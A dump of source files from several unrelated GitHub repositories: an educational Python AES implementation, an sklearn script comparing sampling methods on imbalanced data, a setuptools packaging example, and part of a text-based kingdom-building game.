[0x00]*4\n\t\ttmp = 0x00\n\t\tfor i in xrange(len(matrix)):\n\t\t\tactCol = libutils._getcolumn(matrix,i)\n\t\t\tfor j in xrange(len(rgfield)):\n\t\t\t\tfor x in xrange(len(rgfield[j])):\n\t\t\t\t\tactCol[x] = actCol[x] & 0x000000FF # If it has more than 8-bits truncate it\n\t\t\t\t\txored = actCol[x] & 0x00000080\n\t\t\t\t\tif rgfield[j][x] == 0x01:\n\t\t\t\t\t\ttmp = 
actCol[x]\t\t\t\t\t\n\t\t\t\t\telif rgfield[j][x] == 0x02:\n\t\t\t\t\t\ttmp = actCol[x] << 1\n\t\t\t\t\t\tif xored != 0x00000080:\n\t\t\t\t\t\t\ttmp = tmp ^ cnst\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\telse:\t\n\t\t\t\t\t\ttmp = actCol[x] << 1\n\t\t\t\t\t\tif xored != 0x00000080:\n\t\t\t\t\t\t\ttmp = tmp ^ cnst\t\n\t\t\t\t\t\ttmp = tmp ^ actCol[x]\t\t\t\t\n\t\t\t\t\tacum = acum ^ tmp\n\t\t\t\t\tacum &= 0x000000FF\n\t\t\t\t\ttmp = 0x00\n\t\t\t\tendCol[j] = acum\n\t\t\t\tacum \t = 0x00\n\t\t\tmatrix = libutils._changecolumn(matrix,endCol,i)\n\t\treturn matrix\n\t\t\n\t\t\n\t@staticmethod\n\t## Extract round key n from schedule ##\n\t## \n\tdef _extractroundkey(schedule,n):\n\t\troundKey = [[],[],[],[]]\n\t\tfor i in xrange(len(schedule)):\n\t\t\tfor j in range(n*4,(n*4)+4):\n\t\t\t\troundKey[i].append(schedule[i][j])\n\t\treturn roundKey\n\t\t\t\t\t\n\t\nclass cipheralgorithms:\n\t\n\t@staticmethod\n\tdef _aes(*args):\n\t\tcipherText = [[0x32,0x88,0x31,0xe0],[0x43,0x5a,0x31,0x37],[0xf6,0x30,0x98,0x07],[0xa8,0x8d,0xa2,0x34]]\n\t\tcipherKey = [[0x2b,0x28,0xab,0x09],[0x7e,0xae,0xf7,0xcf],[0x15,0xd2,0x15,0x4f],[0x16,0xa6,0x88,0x3c]]\n\t\tauxBlock = [[0x00]*4]\n\t\tif args != ():\n\t\t\tcipherText = args[0]\n\t\t\tif len(args) == 2:\n\t\t\t\tcipherKey = args[1]\n\t\t# Set schedule -> we can obtain later all round keys by this matrix #\n\t\tschedule = cipheralgorithms.__keyschedule(cipherKey)\n\t\t\n\t\t###################### Show ###################### \n\t\tdef _showBlock(auxBlock):\n\t\t\tfor i in auxBlock:\n\t\t\t\tfor j in i:\n\t\t\t\t\tprint hex(j),\" \",\n\t\t\t\tprint \"\\n\"\n\t\t###################### End Show ######################\n\t\t \n\t\t# Make init AddRoundKey with cipherKey #\n\t\tauxBlock = libutils._addroundkey(cipherText,libutils._extractroundkey(schedule,0))\n\t\tprint \"First AddRoundKey: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t# Make 9 main rounds #\n\t\tfor x in range(1,10):\t\n\t\t\t## SubBytes ##\n\t\t\tauxBlock = 
libutils._subbytesmatrix(auxBlock)\n\t\t\tprint \"Round \" + str(x) + \" SubBytes: \\n\"\n\t\t\t_showBlock(auxBlock)\n\t\t\t## ShiftRows ##\n\t\t\tauxBlock = libutils._shiftrows(auxBlock)\n\t\t\tprint \"Round \" + str(x) + \" ShiftRows: \\n\"\n\t\t\t_showBlock(auxBlock)\n\t\t\t## MixColumns ##\n\t\t\tauxBlock = libutils._mixcolumns(auxBlock)\n\t\t\tprint \"Round \" + str(x) + \" MixColumns: \\n\"\n\t\t\t_showBlock(auxBlock)\n\t\t\t## AddRoundKey ##\n\t\t\tprint \"Round \" + str(x) + \" Key to cipher in this round: \\n\"\n\t\t\t_showBlock(libutils._extractroundkey(schedule,x))\n\t\t\tprint \"Round \" + str(x) + \" Keyed: \\n\"\n\t\t\tauxBlock = libutils._addroundkey(auxBlock,libutils._extractroundkey(schedule,x))\n\t\t\t_showBlock(auxBlock)\n\t\t\t\n\t\t## Make final round ##\t\n\t\t## SubBytes ##\n\t\tauxBlock = libutils._subbytesmatrix(auxBlock)\n\t\tprint \"Final subbytes: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t## ShiftRows ##\n\t\tauxBlock = libutils._shiftrows(auxBlock)\n\t\tprint \"Final shiftrows: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t## AddRoundKey ##\n\t\tauxBlock = libutils._addroundkey(auxBlock,libutils._extractroundkey(schedule,10))\n\t\tprint \"Final keyed: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t\t\n\t@staticmethod\n\tdef __keyschedule(cipherKey):\t\t\t\t\n\t\tantKey,schedule,actCol,i,actPos,actPosRcon = cipherKey,[],None,0,0,0\n\t\t## Fill schedule 4x40 ##\n\t\tschedule = [[0x00]*44 for i in xrange(4)]\n\t\t## Set initial status of schedule ##\n\t\tfor col in libutils._getallcolumns(antKey):\n\t\t\tschedule = libutils._changecolumn(schedule,col,actPos)\n\t\t\tactPos += 1\n\t\tfor i in xrange(40):\n\t\t\t## Take ant col ##\n\t\t\tactCol = libutils._getcolumn(schedule,actPos-1)\n\t\t\t## If is word in multiple of 4, rotword and subbytes ##\n\t\t\tif(actPos%4==0):\n\t\t\t\tactCol = libutils._rotword(actCol)\n\t\t\t\tactCol = libutils._subbytes(actCol)\n\t\t\t\tactCol = 
libutils._xor3columns(libutils._getcolumn(schedule,actPos-4),actCol,libutils._getcolumn(rcon,actPosRcon))\n\t\t\t\tactPosRcon += 1\n\t\t\telse:\n\t\t\t\tactCol = libutils._xor2columns(libutils._getcolumn(schedule,actPos-4),actCol)\n\t\t\tlibutils._changecolumn(schedule,actCol,actPos)\n\t\t\tactPos += 1\n\t\treturn schedule\n\t\t\n\t\nif __name__ == \"__main__\":\n\t# If there isn't arguments, values are set by default #\n\t# 1º -> CipherText (128bits Block)\n\t# 2º -> CipherKey (128bits Block)\n\tcipheralgorithms._aes()\n\t\n\n" } ]
1
brenden17/imbalanced-data
https://github.com/brenden17/imbalanced-data
008ac9ccfae891de575c41e3a957205bc24aee5d
a4d89313279eea1511faf44ae4f5c65c86415f0e
f1fb52c951bc5b386ac7d7262e4d99184fd85d94
refs/heads/master
2020-05-27T11:58:50.564233
2014-03-31T23:43:28
2014-03-31T23:43:28
15,877,418
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5781803131103516, "alphanum_fraction": 0.5883822441101074, "avg_line_length": 33.0709228515625, "blob_id": "ec649d0f95f971726a9a4002927734127ef592d8", "content_id": "242edc173e098710bd83f34d21ea854489dc188a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4803, "license_type": "no_license", "max_line_length": 80, "num_lines": 141, "path": "/imbalanceddata.py", "repo_name": "brenden17/imbalanced-data", "src_encoding": "UTF-8", "text": "\"\"\" Under sampling and over sampling on imbalanced data\nDataset : http://archive.ics.uci.edu/ml/datasets/Balance+Scale\nRef : http://bi.snu.ac.kr/Publications/Conferences/Domestic/KIISE2013f_KMKim.pdf\n\"\"\"\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.svm import SVC\nfrom sklearn.cross_validation import cross_val_score, train_test_split\nfrom sklearn.metrics import classification_report\n\ndef get_fullpath(filename):\n return os.path.abspath(os.path.join(os.path.dirname(__file__), filename))\n\ndef read_file():\n return pd.read_csv(get_fullpath('balance-scale.data'), delimiter=',',\n names=['class', 'lweight', 'ldist', 'rweight', 'rdist'])\n\ndef analysis_data():\n df = read_file()\n X_outlier = df[df['class'] == 'B'] # .ix[idx]\n X_train = df[df['class'] == 'L']\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ax.scatter(X_outlier['lweight'], X_outlier['ldist'],\n X_outlier['rweight'], c='r')\n ax.scatter(X_train['lweight'], X_train['ldist'],\n X_train['rweight'], c='b')\n ax.set_xlabel('Mileage')\n ax.set_ylabel('Transmission')\n ax.set_zlabel('Price')\n plt.show()\n\ndef load_original_data():\n rawdata = read_file()\n le = LabelEncoder()\n X = 
rawdata.icol(range(1, 5)).values\n y = le.fit_transform(rawdata['B'].values)\n return X, y\n\ndef load_undersampling():\n rawdata = read_file()\n n_sample = rawdata[rawdata['class'] == 'B'].shape[0]\n B = rawdata[rawdata['class'] == 'B']\n L = rawdata[rawdata['class'] == 'L'][:n_sample]\n R = rawdata[rawdata['class'] == 'R'][:n_sample]\n d = pd. concat([B, L, R])\n le = LabelEncoder()\n X = d.icol(range(1, 5)).values\n y = le.fit_transform(d['class'].values)\n return X, y\n\ndef load_sampling():\n size = 200\n rawdata = read_file()\n n_sample = rawdata[rawdata['class'] == 'B'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n B = rawdata[rawdata['class'] == 'B'].iloc[idx]\n\n n_sample = rawdata[rawdata['class'] == 'L'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n L = rawdata[rawdata['class'] == 'L'].iloc[idx]\n\n n_sample = rawdata[rawdata['class'] == 'R'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n R = rawdata[rawdata['class'] == 'R'].iloc[idx]\n\n df = pd.concat([B, L, R])\n\n le = LabelEncoder()\n X = df.icol(range(1, 5)).values\n y = le.fit_transform(df['class'].values)\n return X, y\n\ndef load_data_with_SMOTE():\n rawdata = read_file()\n size = 150\n small = rawdata[rawdata['class'] == 'B']\n n_sample = small.shape[0]\n idx = np.random.randint(0, n_sample, size)\n X = small.iloc[idx, range(1, 5)].values\n y = small.iloc[idx, 0].values\n knn = NearestNeighbors(n_neighbors=2)\n knn.fit(X)\n _d, i = knn.kneighbors(X)\n idx2 = i[:, 1]\n diff = X - X[idx2]\n X = X + np.random.random(4) * diff\n B = np.concatenate([np.transpose(y[np.newaxis]), X], axis=1)\n B = pd.DataFrame(B)\n\n n_sample = rawdata[rawdata['class'] == 'L'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n L = rawdata[rawdata['class'] == 'L'].iloc[idx]\n\n n_sample = rawdata[rawdata['class'] == 'R'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n R = rawdata[rawdata['class'] == 'R'].iloc[idx]\n\n d = np.concatenate([B.values, L.values, R.values])\n\n le = 
LabelEncoder()\n X = d[:, 1:5]\n y = le.fit_transform(d[:, 0])\n return X, y\n\ndef create_learners():\n return [ExtraTreesClassifier(), SVC(), LogisticRegression()]\n\ndef analysis(load_function):\n X, y = load_function()\n X_train, X_test, Y_train, Y_test, = \\\n train_test_split(X, y,\n test_size=0.3, random_state=42)\n size = 3\n learners = create_learners()\n for learner in learners:\n print '%s -\\t\\t %f' % (learner.__class__.__name__,\n sum(cross_val_score(learner, X, y, cv=size)) / size)\n learner.fit(X_train, Y_train)\n Y_predict = learner.predict(X_test)\n print learner.__class__.__name__\n print classification_report(Y_test, Y_predict)\n\nif __name__ == '__main__':\n print \"=================== Original Data ===================\"\n analysis(load_original_data)\n print \"=================== Under Sampling ===================\"\n analysis(load_undersampling)\n print \"=================== Sampling ===================\"\n analysis(load_sampling)\n print \"=================== SMOTE ===================\"\n analysis(load_data_with_SMOTE)" }, { "alpha_fraction": 0.6877828240394592, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 23.66666603088379, "blob_id": "a53ea4f37321df6b0555f799da70803c66ded215", "content_id": "b1286b54b34602389276e9d195a8e6bae17d0d5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 277, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/README.md", "repo_name": "brenden17/imbalanced-data", "src_encoding": "UTF-8", "text": "imbalanced data\n================\n불균형 데이터를 해결하기 위해 몇가지 방법을 사용한다.\n\n## data set\nhttp://archive.ics.uci.edu/ml/datasets/Balance+Scale\n\n## 사용한 논문\nRef : http://bi.snu.ac.kr/Publications/Conferences/Domestic/KIISE2013f_KMKim.pdf" } ]
2
kushal124/pypackaging-test
https://github.com/kushal124/pypackaging-test
f36f51972304fba96b362aec35397a60413496af
75ab051223e2c17aef28d40cd594b6b393fc3b1d
b55327d0008e8f6b29390498a58e808d28586b19
refs/heads/master
2020-04-06T04:52:34.102045
2015-03-07T21:23:06
2015-03-07T21:23:06
31,827,987
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5573248267173767, "alphanum_fraction": 0.5732483863830566, "avg_line_length": 27.454545974731445, "blob_id": "2c984f81c29324f59233d5dcbcc5a7a589375494", "content_id": "168484fbbefc1f472f40461219c6cc96143fbd0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 314, "license_type": "no_license", "max_line_length": 59, "num_lines": 11, "path": "/setup.py", "repo_name": "kushal124/pypackaging-test", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name='funniest',\n version='0.1',\n description='A test package',\n url = 'http:/github.com/kushal124/pypackagingtest',\n author = 'Kushal',\n author_email = \"[email protected]\",\n license='MIT',\n packages=['funniest'],\n zip_safe=False)\n\n" }, { "alpha_fraction": 0.6618704795837402, "alphanum_fraction": 0.6618704795837402, "avg_line_length": 22.16666603088379, "blob_id": "34802adf281fceb1d7ed7deed9c359f3699d30bd", "content_id": "9c8b486100c5261980804e31f638514e8e038707", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 59, "num_lines": 6, "path": "/funniest/__init__.py", "repo_name": "kushal124/pypackaging-test", "src_encoding": "UTF-8", "text": "def testfunction():\n '''\n This is a test function for learning pythong packaging.\n\n '''\n return \"TestFunction is being called\"\n" } ]
2
kwoolter/Kingdom2
https://github.com/kwoolter/Kingdom2
8a653a4acc1c2a09a927a75cf426e9dfe02605f3
5df5b1034270fc0b80fb8be21acd2d94b9950564
1bd5357c2109cfc6108b008875fc05bc70c09df2
refs/heads/master
2020-04-21T23:46:49.843067
2019-02-13T13:55:21
2019-02-13T13:55:21
169,957,292
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5423162579536438, "alphanum_fraction": 0.5456570386886597, "avg_line_length": 19.9069766998291, "blob_id": "a775eaa09b834ba1f339b8b1449df130964d3ece", "content_id": "84f5f16c39bb0f1b74119b8323cc64066354c42f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 80, "num_lines": 43, "path": "/kingdom2/model/utils.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import collections\n\nclass Event():\n # Event Types\n DEFAULT = \"default\"\n STATE = \"state\"\n GAME = \"game\"\n\n def __init__(self, name: str, description: str = None, type: str = DEFAULT):\n self.name = name\n self.description = description\n self.type = type\n\n def __str__(self):\n return \"{0}:{1} ({2})\".format(self.name, self.description, self.type)\n\n\nclass EventQueue():\n def __init__(self):\n self.events = collections.deque()\n\n def add_event(self, new_event: Event):\n self.events.append(new_event)\n\n def pop_event(self):\n return self.events.pop()\n\n def size(self):\n return len(self.events)\n\n def print(self):\n for event in self.events:\n print(event)\n\ndef is_numeric(s):\n try:\n x = int(s)\n except:\n try:\n x = float(s)\n except:\n x = None\n return x" }, { "alpha_fraction": 0.6800000071525574, "alphanum_fraction": 0.746666669845581, "avg_line_length": 14, "blob_id": "2c537f6577027b34cf39f55d5fb617891db2afd1", "content_id": "ce743baebe56b724b60a32fd412df70d7ab40a96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/README.md", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "# Kingdom 2\n:copyright: kwoolter :monkey: 2019\n\n## About\nConstruction game\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 24, "blob_id": 
"5cbb3351a98ae0ead47e698890817de978045b96", "content_id": "70c37a6e93341b26be8be07119ac4d58859d06f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25, "license_type": "no_license", "max_line_length": 24, "num_lines": 1, "path": "/kingdom2/controller/__init__.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "from .cli import GameCLI\n" }, { "alpha_fraction": 0.8500000238418579, "alphanum_fraction": 0.8500000238418579, "avg_line_length": 39, "blob_id": "2e7814f0a169c99da80a691e08580c430bd7294f", "content_id": "6214908b7396a375bdc531810a10bd98b541e740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/kingdom2/view/__init__.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "from .text_view import TextView\nfrom .text_view import InventoryTextView\nfrom .text_view import CreationsTextView\nfrom .text_view import WorldMapTextView\nfrom .text_view import WorldTopoModelTextView\n" }, { "alpha_fraction": 0.5609022378921509, "alphanum_fraction": 0.5699248313903809, "avg_line_length": 24.834951400756836, "blob_id": "ef3deff0ef914106225bb842e62ce745daf5a21d", "content_id": "058fa29a8a1abe239d26a680292e6c9ebae8c51b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2660, "license_type": "no_license", "max_line_length": 104, "num_lines": 103, "path": "/kingdom2/controller/cli.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import cmd\nfrom .utils import *\nimport logging\nimport os\nimport random\n\nimport kingdom2.model as model\nimport kingdom2.view as view\n\nclass GameCLI(cmd.Cmd):\n\n intro = \"Welcome to The Kingdom 2.\\nType 'start' to get going!\\nType 'help' for a list of commands.\"\n prompt = \"What next?\"\n\n def __init__(self):\n\n 
super(GameCLI, self).__init__()\n\n self.model = model.Game(\"Kingdom 2\")\n self.view = view.TextView(self.model)\n\n def run(self):\n self.cmdloop()\n\n def emptyline(self):\n pass\n\n def do_quit(self, arg):\n \"\"\"Quit the game\"\"\"\n try:\n\n if confirm(\"Are you sure you want to quit?\") is True:\n print(\"\\nThanks for playing.\")\n\n self.model.do_game_over()\n self.print_events()\n\n print(str(self.model))\n print(\"\\nBye bye.\")\n\n except Exception as err:\n print(str(err))\n\n def do_start(self, arg):\n\n self.model.start()\n self.print_events()\n\n def do_tick(self, arg : str = \"1\"):\n\n i = is_numeric(arg)\n if i is not None:\n for i in range (0, i):\n self.model.tick()\n self.view.tick()\n\n self.print_events()\n\n def do_print(self, arg):\n self.view.draw()\n\n def do_inv(self, arg):\n inv_view = view.InventoryTextView(self.model.inventory)\n inv_view.draw()\n\n def do_map(self, arg):\n map_view = view.WorldMapTextView(self.model.map)\n map_view.draw()\n #map_view.draw((5,5,10,10))\n\n def do_topo(self, arg):\n map_view = view.WorldTopoModelTextView(self.model.map)\n map_view.draw()\n #map_view.draw((5,5,10,10))\n\n def do_test(self, arg):\n\n resource_types = model.ResourceFactory.get_resource_types()\n\n for type in resource_types:\n new_resource = model.ResourceFactory.get_resource(type)\n self.model.inventory.add_resource(new_resource, random.randint(20,60))\n\n self.model.inventory.print()\n\n for creatable_name in self.model.creatables.names:\n creatable = self.model.creatables.get_creatable_copy(creatable_name)\n ok = self.model.inventory.is_creatable(creatable)\n print(\"{0}: creatable = {1}\".format(creatable.name, ok))\n self.model.add_creation(creatable)\n\n def print_events(self):\n\n # Print any events that got raised\n event = self.model.get_next_event()\n if event is not None:\n print(\"Game event(s)...\")\n\n while event is not None:\n\n print(\" * \" + str(event))\n\n event = self.model.get_next_event()" }, { "alpha_fraction": 
0.5544041395187378, "alphanum_fraction": 0.5640085935592651, "avg_line_length": 31.496919631958008, "blob_id": "e6caa164ed94d73aff524dff58f13dbd5d14eb8b", "content_id": "054001e090ab6e7c9a7e35107babbdb359db54eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15826, "license_type": "no_license", "max_line_length": 107, "num_lines": 487, "path": "/kingdom2/model/building_blocks.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import copy\nimport csv\nimport logging\nimport random\nfrom xml.dom.minidom import *\n\nimport numpy\n\nfrom .utils import is_numeric\n\n\nclass Resource:\n CATEGORY_DEFAULT = \"default\"\n\n def __init__(self, name: str, description: str, category: str = CATEGORY_DEFAULT, graphic: str = None):\n self.name = name\n self.description = description\n self.category = category\n self.graphic = graphic\n\n def __str__(self):\n _str = \"{0} ({3}): {1} ({2})\".format(self.name, self.description, self.category, self.graphic)\n return _str\n\n\nclass Creatable():\n\n def __init__(self, name: str, description: str, ticks_required: int = 10):\n self.name = name\n self.description = description\n self.pre_requisites = {}\n self.ticks_done = 0\n self.ticks_required = ticks_required\n self.output = {}\n\n def __str__(self):\n\n _str = \"{0} ({1}) {2}% complete\".format(self.name, self.description, self.percent_complete)\n\n if len(self.pre_requisites.keys()) > 0:\n _str += \"\\n\\tPre-requisites:\"\n for k, v in self.pre_requisites.items():\n _str += \"\\n\\t\\t- {0}:{1}\".format(k, v)\n\n if len(self.output.keys()) > 0:\n _str += \"\\n\\tOutputs:\"\n for k, v in self.output.items():\n _str += \"\\n\\t\\t- {0}:{1}\".format(k, v)\n\n return _str\n\n @property\n def is_complete(self):\n return self.ticks_done >= self.ticks_required\n\n @property\n def percent_complete(self):\n try:\n percent_complete = int(min(100, self.ticks_done * 100 / self.ticks_required))\n except Exception 
as err:\n print(\"{0}/{1}\".format(self.ticks_done, self.ticks_required))\n print(str(err))\n percent_complete = 0\n\n return percent_complete\n\n def add_pre_requisite(self, new_resource_name: str, item_count: int = 1):\n\n if new_resource_name not in self.pre_requisites.keys():\n self.pre_requisites[new_resource_name] = 0\n\n self.pre_requisites[new_resource_name] += item_count\n\n def add_output(self, new_resource_name: str, item_count: int = 1):\n\n if new_resource_name not in self.output.keys():\n self.output[new_resource_name] = 0\n\n self.output[new_resource_name] += item_count\n\n def tick(self):\n if self.is_complete is False:\n self.ticks_done += 1\n if self.is_complete is True:\n self.do_complete()\n\n def do_complete(self):\n print(\"Construction complete for {0}!\".format(self.name))\n\n\nclass Inventory():\n\n def __init__(self):\n\n self.resources = {}\n\n @property\n def resource_type_count(self):\n return len(self.resources.keys())\n\n def add_resource(self, new_resource: Resource, item_count: int = 1):\n\n if new_resource not in self.resources.keys():\n self.resources[new_resource] = 0\n\n self.resources[new_resource] += item_count\n\n def is_creatable(self, new_creatable: Creatable):\n\n is_creatable = True\n\n for pre_req_name, count in new_creatable.pre_requisites.items():\n pre_req = ResourceFactory.get_resource(pre_req_name)\n if pre_req not in self.resources.keys():\n is_creatable = False\n break\n else:\n inv_count = self.resources[pre_req]\n if count > inv_count:\n is_creatable = False\n break\n\n return is_creatable\n\n def print(self):\n if len(self.resources.keys()) > 0:\n _str = \"Inventory ({0} resource types)\".format(self.resource_type_count)\n for k, v in self.resources.items():\n _str += \"\\n\\t{0} ({1}) : {2}\".format(k.name, k.description, v)\n else:\n _str = \"No resources in your inventory!\"\n\n print(_str)\n\n\nclass ResourceFactory:\n resources = {}\n\n def __init__(self, file_name: str):\n\n self.file_name = file_name\n\n 
@staticmethod\n def get_resource(name: str):\n resource = None\n\n if name in ResourceFactory.resources.keys():\n resource = ResourceFactory.resources[name]\n\n return resource\n\n @staticmethod\n def get_resource_copy(name: str):\n resource = None\n\n if name in ResourceFactory.resources.keys():\n resource = copy.deepcopy(ResourceFactory.resources[name])\n\n return resource\n\n @staticmethod\n def get_resource_types():\n\n return list(ResourceFactory.resources.keys())\n\n def load(self):\n\n print(\"\\nLoading resources...\")\n\n # Attempt to open the file\n with open(self.file_name, 'r') as object_file:\n\n # Load all rows in as a dictionary\n reader = csv.DictReader(object_file)\n\n # For each row in the file....\n for row in reader:\n name = row.get(\"Name\")\n description = row.get(\"Description\")\n category = row.get(\"Category\")\n graphic = row.get(\"Graphic\")\n if graphic == \"\":\n graphic = None\n\n new_resource = Resource(name, description, category, graphic)\n ResourceFactory.resources[new_resource.name] = new_resource\n\n print(str(new_resource))\n\n # Close the file\n object_file.close()\n\n print(\"\\n{0} resources loaded.\".format(len(self.resources.keys())))\n\n\nclass CreatableFactoryXML(object):\n '''\n Load some creatables from an XML file and store them in a dictionary\n '''\n\n def __init__(self, file_name: str):\n\n self.file_name = file_name\n self._dom = None\n self._creatables = {}\n\n @property\n def count(self):\n return len(self._creatables)\n\n @property\n def names(self):\n return list(self._creatables.keys())\n\n # Load in the quest contained in the quest file\n def load(self):\n\n self._dom = parse(self.file_name)\n\n assert self._dom.documentElement.tagName == \"creatables\"\n\n logging.info(\"%s.load(): Loading in %s\", __class__, self.file_name)\n\n # Get a list of all quests\n creatables = self._dom.getElementsByTagName(\"creatable\")\n\n # for each quest...\n for creatable in creatables:\n\n # Get the main tags that describe 
the quest\n name = self.xml_get_node_text(creatable, \"name\")\n desc = self.xml_get_node_text(creatable, \"description\")\n ticks_required = self.xml_get_node_value(creatable, \"ticks_required\")\n\n # ...and create a basic creatable object\n new_creatable = Creatable(name=name, description=desc, ticks_required=ticks_required)\n\n logging.info(\"%s.load(): Loading Creatable '%s'...\", __class__, new_creatable.name)\n\n # Next get a list of all of the pre-requisites\n pre_requisites = creatable.getElementsByTagName(\"pre_requisites\")[0]\n resources = pre_requisites.getElementsByTagName(\"resource\")\n\n # For each pre-requisite resource...\n for resource in resources:\n # Get the basic details of the resource\n name = self.xml_get_node_text(resource, \"name\")\n count = self.xml_get_node_value(resource, \"count\")\n\n new_creatable.add_pre_requisite(name, count)\n\n logging.info(\"{0}.load(): adding pre-req {1} ({2})\".format(__class__, name, count))\n\n # Next get a list of all of the outputs\n pre_requisites = creatable.getElementsByTagName(\"outputs\")[0]\n resources = pre_requisites.getElementsByTagName(\"resource\")\n\n # For each output resource...\n for resource in resources:\n\n # Get the basic details of the resource\n name = self.xml_get_node_text(resource, \"name\")\n count = self.xml_get_node_value(resource, \"count\")\n action = self.xml_get_node_text(resource, \"action\")\n if action is not None:\n action = \"replace\"\n else:\n action = \"inventory\"\n\n new_creatable.add_output(name, count)\n\n logging.info(\"{0}.load(): adding output {1} ({2})\".format(__class__, name, count))\n\n logging.info(\"{0}.load(): Creatable '{1}' loaded\".format(__class__, new_creatable.name))\n print(str(new_creatable))\n\n # Add the new creatable to the dictionary\n self._creatables[new_creatable.name] = new_creatable\n\n self._dom.unlink()\n\n # From a specified node get the data value\n def xml_get_node_text(self, node, tag_name: str):\n\n tag = 
node.getElementsByTagName(tag_name)\n\n # If the tag exists then get the data value\n if len(tag) > 0:\n value = tag[0].firstChild.data\n # Else use None\n else:\n value = None\n\n return value\n\n def xml_get_node_value(self, node, tag_name: str):\n\n value = self.xml_get_node_text(node, tag_name)\n\n return is_numeric(value)\n\n def print(self):\n for creatable in self._creatables.values():\n print(creatable)\n\n def get_creatable(self, name: str):\n\n return self._creatables[name]\n\n def get_creatable_copy(self, name: str):\n return copy.deepcopy(self._creatables[name])\n\n\nclass WorldMap:\n TILE_GRASS = \"Grass\"\n TILE_SEA = \"Sea\"\n\n def __init__(self, name: str, width: int = 50, height: int = 50):\n self.name = name\n self._width = width\n self._height = height\n self.map = []\n self.topo_model_pass2 = []\n\n def initialise(self):\n\n # Generate a topology model for the map\n self.generate_topology()\n\n # Clear the map squares\n self.map = [[None for y in range(0, self._height)] for x in range(0, self._width)]\n\n grass = ResourceFactory.get_resource_copy(WorldMap.TILE_GRASS)\n self.add_objects(grass.graphic, 40)\n\n grass = ResourceFactory.get_resource_copy(WorldMap.TILE_SEA)\n self.add_objects(grass.graphic, 40)\n\n def generate_topology(self):\n\n # Topo controls\n MAX_ALTITUDE = 10.0\n MIN_ALTITUDE_CLIP_FACTOR = -0.5\n ALTITUDE_OFFSET = 0.0\n MIN_ALTITUDE = 0.0\n MAX_SLOPE = MAX_ALTITUDE * 0.15\n MIN_SLOPE = MAX_SLOPE * -1.0\n MAX_SLOPE_DELTA = MAX_SLOPE * 2.0\n\n # Clear the topo model\n topo_model_pass1 = [[None for y in range(0, self._height)] for x in range(0, self._width)]\n self.topo_model_pass2 = [[None for y in range(0, self._height)] for x in range(0, self._width)]\n\n # Create an initial topography using altitudes and random slope changes\n print(\"Pass 1: altitudes and slopes...\")\n\n # Set the first square to be a random altitude with slopes in range\n topo_model_pass1[0][0] = (random.uniform(MIN_ALTITUDE, MAX_ALTITUDE),\n 
random.uniform(MIN_SLOPE, MAX_SLOPE),\n random.uniform(MIN_SLOPE, MAX_SLOPE))\n\n for y in range(0, self._height):\n for x in range(0, self._width):\n if y == 0:\n north_slope = random.uniform(MIN_SLOPE, MAX_SLOPE)\n north_altitude = random.uniform(MIN_ALTITUDE, MAX_ALTITUDE)\n # north_altitude = 0\n else:\n north_altitude, tmp, north_slope = topo_model_pass1[x][y - 1]\n\n if x == 0:\n west_slope = random.uniform(MIN_SLOPE, MAX_SLOPE)\n west_altitude = random.uniform(MIN_ALTITUDE, MAX_ALTITUDE)\n # west_altitude = 0\n else:\n west_altitude, west_slope, tmp = topo_model_pass1[x - 1][y]\n\n clip = lambda n, minn, maxn: max(min(maxn, n), minn)\n\n altitude = ((north_altitude + north_slope) + (west_altitude + west_slope)) / 2\n altitude = clip(altitude, MIN_ALTITUDE, MAX_ALTITUDE)\n\n east_slope = west_slope + ((random.random() * MAX_SLOPE_DELTA) - MAX_SLOPE_DELTA / 2)\n east_slope = clip(east_slope, MIN_SLOPE, MAX_SLOPE)\n\n south_slope = north_slope + ((random.random() * MAX_SLOPE_DELTA) - MAX_SLOPE_DELTA / 2)\n south_slope = clip(south_slope, MIN_SLOPE, 